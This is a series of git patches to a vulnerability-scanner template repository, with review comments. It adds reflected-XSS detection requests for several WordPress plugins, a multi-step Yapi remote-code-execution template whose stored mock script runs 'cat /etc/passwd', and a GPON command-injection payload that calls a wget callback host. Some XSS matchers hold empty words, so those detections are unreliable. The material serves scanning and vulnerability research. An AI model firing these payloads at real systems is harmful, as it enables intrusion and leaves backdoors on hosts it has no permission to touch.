@@ -4,6 +4,7 @@ info: name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 tags: cve,cve2012,wordpress,xss,wp-plugin From 321fcfdac18772e49e5bbef147710878d48d0e76 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:05:55 +0530 Subject: [PATCH 019/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 8bb63f3f98..e88b0cf14b 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
@@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From ee1719ee26c086eaf80d548299dbd8437c27488b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:07:53 +0530 Subject: [PATCH 020/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index e88b0cf14b..25c8832501 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
@@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From 8a28dc19356679e00bd410e4db4650c1cb180d9e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 19:30:44 +0700 Subject: [PATCH 021/132] Create CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16525.yaml 
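Review bot: Four of the five paths are now commented out with no explanation, and this commit swaps which one stays live (the previous commit kept `args[before_widget]`, this one keeps `title`) without saying why, so a maintainer cannot tell whether the others were false positives, unverified, or merely noisy. Either delete them (git keeps the history) or prefix the block with the reason, e.g. `# only the title parameter was confirmed to reflect; the other injection points from the CVE are kept for reference but unverified`, adjusted to whatever was actually observed.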
diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml new file mode 100644 index 0000000000..23b3cdac75 --- /dev/null +++ b/cves/2019/CVE-2019-16525.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 642f71278da4bcfdbe03c7a437ab2071921da1e2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 22:11:22 +0530 Subject: [PATCH 022/132] Added Yapi RCE --- vulnerabilities/other/yapi-rce.yaml | 110 ++++++++++++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 vulnerabilities/other/yapi-rce.yaml diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml new file mode 100644 index 0000000000..e7ad5c1b20 --- /dev/null +++ b/vulnerabilities/other/yapi-rce.yaml 
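Review bot: The payload closes an SVG element (`%3C%2Fpath%3E`), which suggests `checklist-icon.php` emits SVG; if the response is served as `image/svg+xml` the `text/html` header matcher never matches and the template cannot fire, while if it is served as text/html the `</path>` is pointless, so check the real Content-Type and match on that. As rendered, the body matcher's word is `""`, which matches anything; the committed value should be the exact reflected string, quoted, e.g. `- "<script>alert(123)</script>"`.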
@@ -0,0 +1,110 @@ +id: yapi-rce + +info: + name: Yapi Remote Code Execution + author: pikpikcu + severity: critical + tags: yapi,rce + reference: | + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip + + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 
10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 From 28278b45a259f0862d52dde84608509cc799ab0a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:06:33 +0700 Subject: [PATCH 023/132] Create CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16332.yaml diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml new file mode 100644 index 0000000000..fa833c4377 --- /dev/null +++ b/cves/2019/CVE-2019-16332.yaml 
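Review bot: A positive result leaves a persistent backdoor on the target: request 1 registers a user with a random password nobody records, requests 3 and 5 create a project and interface, and request 6 stores a mock script that runs `cat /etc/passwd` through `child_process` on every GET to `/mock/{{project_id}}/{{randstr_1}}`, and nothing cleans any of it up. At minimum `description:` must say that the template creates an account, a project and an always-on RCE mock endpoint on the target, and the sequence should end with a request that deletes the interface/project (or resets `mock_script` to empty), or the operator must be told to do so by hand. The hard-coded `Content-Length` values (94, 106, 89, 382) cannot match bodies built from `{{randstr}}`; unless nuclei recomputes them for non-`unsafe` raw requests, drop those lines. The extractors are applied to every response and depend on JSON key order (`"tag":[],"_id":`, `"req_body_form":[],"_id":`), which is fragile across Yapi versions.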
@@ -0,0 +1,29 @@
+id: CVE-2019-16332
+
+info:
+ name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From bf68e5060ddf745aaedc9c93f9198415f5ee8f8f Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 16 Jul 2021 00:09:33 +0700
Subject: [PATCH 024/132] Create CVE-2019-15713.yaml
---
 cves/2019/CVE-2019-15713.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 cves/2019/CVE-2019-15713.yaml
diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml
new file mode 100644
index 0000000000..405bd13a64
--- /dev/null
+++ b/cves/2019/CVE-2019-15713.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From 367f5d225dc52b458233fef0b3d5c0aec5918a0f Mon Sep 17 00:00:00 2001
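Review bot: The first body matcher in both templates on this line reads `words: - ""`, an empty string, which every response contains; together with the `text/html` header check and `status: 200` the template then fires on any HTML page and cannot tell a reflected payload from a normal response. If the expected reflected fragment was lost when this page was rendered, the committed file should be checked against the repository; if the entry really is empty, it must hold the exact fragment the request is expected to reflect. The same empty `words` entry appears in the CVE-2018-20462, CVE-2018-11709, CVE-2018-5316, CVE-2017-18536, CVE-2017-17451, CVE-2017-17059, CVE-2017-17043 and CVE-2017-9288 hunks below, and as a context line in the CVE-2020-17362 hunk, which is presumably why that later commit had to add a second word to reduce false positives.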
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:12:52 +0700 Subject: [PATCH 025/132] Create CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-20462.yaml diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml new file mode 100644 index 0000000000..e136ee5786 --- /dev/null +++ b/cves/2018/CVE-2018-20462.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-20462 + +info: + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9d84281202c85d80bde71b2164cb05e503ba1a2c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:14:42 +0700 Subject: [PATCH 026/132] Create CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-11709.yaml diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml new file mode 100644 index 0000000000..e78227f474 --- /dev/null +++ b/cves/2018/CVE-2018-11709.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5bee8dd7160ecf11ddc9303c54eb123be7679c5c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:16:27 +0700 Subject: [PATCH 027/132] Create CVE-2018-5316.yaml --- cves/2018/CVE-2018-5316.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2018/CVE-2018-5316.yaml diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml new file mode 100644 index 0000000000..7553a25625 --- /dev/null +++ b/cves/2018/CVE-2018-5316.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5316 + +info: + name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6bf13454aef603f4c4f28900e1e96edab43437a8 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Thu, 15 Jul 2021 23:15:22 +0530 Subject: [PATCH 028/132] Update optiLink-ont1gew-gpon-rce.yaml --- vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml index 799426dc22..055c33da1e 100644 --- a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -1,4 +1,4 @@ -id: optiLink-ont1gew-gpon-rce +id: optilink-ont1gew-gpon-rce info: name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution @@ -25,7 +25,7 @@ requests: User: e8c Password: e8c User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 - + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" matchers: From 9286c79bc1db4360fee193d3daa3e82e46c5a773 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 15 Jul 2021 23:15:45 +0530 Subject: [PATCH 029/132] Rename optiLink-ont1gew-gpon-rce.yaml to optilink-ont1gew-gpon-rce.yaml --- ...iLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{optiLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} (100%) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml similarity index 100% rename from vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml rename to vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml From 2c0400ddb2f847ba3cf006be9b495b15574e8a74 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Jul 2021 23:41:09 +0530 Subject: [PATCH 030/132] Add files via upload --- technologies/seeddms-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/seeddms-detect.yaml 
diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml new file mode 100644 index 0000000000..25ca066589 --- /dev/null +++ b/technologies/seeddms-detect.yaml @@ -0,0 +1,19 @@ +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: + - 200 \ No newline at end of file From 97dfd43f1e2462e558a0e53acbd8b9c784cd9c8d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:46:08 +0530 Subject: [PATCH 031/132] Added tag and removed unsafe --- cves/2020/CVE-2020-25506.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 21a5709c95..18de468cad 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -8,7 +8,7 @@ info: reference: | - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,dlink,rce + tags: cve,cve2020,dlink,rce,oob requests: - raw: @@ -28,7 +28,6 @@ requests: Accept: */* Connection: close - unsafe: true matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 94ae6ea0bfcbe28b23563b485efe9311a67d1b34 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:47:05 +0530 Subject: [PATCH 032/132] Added tag --- cves/2020/CVE-2020-26919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index fffb1e22e4..c658ea4e31 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml 
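Review bot: `name: Seeddms-` ends in a stray hyphen and does not follow the `<Product> Detect` naming the other technology templates in this series use (`YApi Detect`, `Node RED Detect`); suggest `name: SeedDMS Detect`. The file also ends without a trailing newline (`\ No newline at end of file`) and has no blank lines separating `info`, `requests` and the individual matcher entries, unlike the neighbouring templates, which makes diffs against it noisier than they need to be.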
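Review bot: Removing `unsafe: true` hands the raw request to the standard HTTP client, which normalises headers and recomputes `Content-Length` rather than sending the bytes verbatim; if the request body above this hunk (its start is outside the hunk) was written to depend on an exact byte layout, the template should be re-tested against a lab instance before merge. A short comment next to `- raw:` recording why the flag was dropped, e.g. `# raw sending (unsafe) not required; standard client is sufficient`, would save the next reader from re-deriving that.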
@@ -8,7 +8,7 @@ info: reference: | - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,netgear,rce + tags: cve,cve2020,netgear,rce,oob requests: - raw: From 8e311dedcc53d95263e67f983331497a679783be Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 16 Jul 2021 00:12:15 +0530 Subject: [PATCH 033/132] Update seeddms-detect.yaml --- technologies/seeddms-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml index 25ca066589..307611e1d0 100644 --- a/technologies/seeddms-detect.yaml +++ b/technologies/seeddms-detect.yaml @@ -8,7 +8,9 @@ requests: - method: GET path: - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - redirects: true + + redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From 81e94056c76ac14113fa61353b75193cf054b6c2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:34:17 +0700 Subject: [PATCH 034/132] Create yapi-detect.yaml --- technologies/yapi-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/yapi-detect.yaml diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml new file mode 100644 index 0000000000..fb38ed2157 --- /dev/null +++ b/technologies/yapi-detect.yaml @@ -0,0 +1,25 @@ +id: yapi-detect + +info: + name: YApi Detect + author: pikpikcu + severity: info + tags: tech,yapi + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}:3000" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + + - type: status + status: + - 200 From 965bc15a89c73cc2a88629e98130895e448f8304 Mon Sep 17 00:00:00 2001 
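Review bot: The second path `"{{BaseURL}}:3000"` appends a port to the whole base URL, so for an input that already carries a port or a path (e.g. `https://host:8443`) the probe becomes `https://host:8443:3000`, an unusable URL, and the check silently fails for exactly those targets. Building it from components (`{{Scheme}}://{{Host}}:3000`, if the engine version in use exposes those variables) or accepting only the plain `{{BaseURL}}/` path would avoid that. A one-line comment above the second entry stating the assumption, e.g. `# assumes the input URL carries no explicit port`, would at least make the limitation visible.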
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:48:26 +0700 Subject: [PATCH 035/132] Create node-red-detect.yaml --- technologies/node-red-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/node-red-detect.yaml diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml new file mode 100644 index 0000000000..9db6df3b6f --- /dev/null +++ b/technologies/node-red-detect.yaml @@ -0,0 +1,24 @@ +id: node-red-detect + +info: + name: Node RED Detect + author: pikpikcu + severity: info + tags: tech,node-red,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Node-RED" + + - type: status + status: + - 200 From e89607941cbea26887b6cd288200508e16133dc8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:20:28 +0700 Subject: [PATCH 036/132] Create CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-18536.yaml diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml new file mode 100644 index 0000000000..ea6350dac0 --- /dev/null +++ b/cves/2017/CVE-2017-18536.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
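Review bot: Matching the bare string `Node-RED` anywhere in a 200 body is a weak fingerprint; any page that merely mentions the product — documentation, a blog post, a dashboard linking to it — satisfies it, so this technology template will produce false positives. A marker specific to the editor page (its title tag or a static asset path observed on a real instance) should be used instead; I cannot confirm one from this hunk alone. At minimum a `part: body` match combined with a distinctive header or a second word would tighten it.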
From d07faf803419f8a65ebddd453279afbc30494766 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:22:53 +0700 Subject: [PATCH 037/132] Create CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17451.yaml diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml new file mode 100644 index 0000000000..a42dbf3e4b --- /dev/null +++ b/cves/2017/CVE-2017-17451.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - 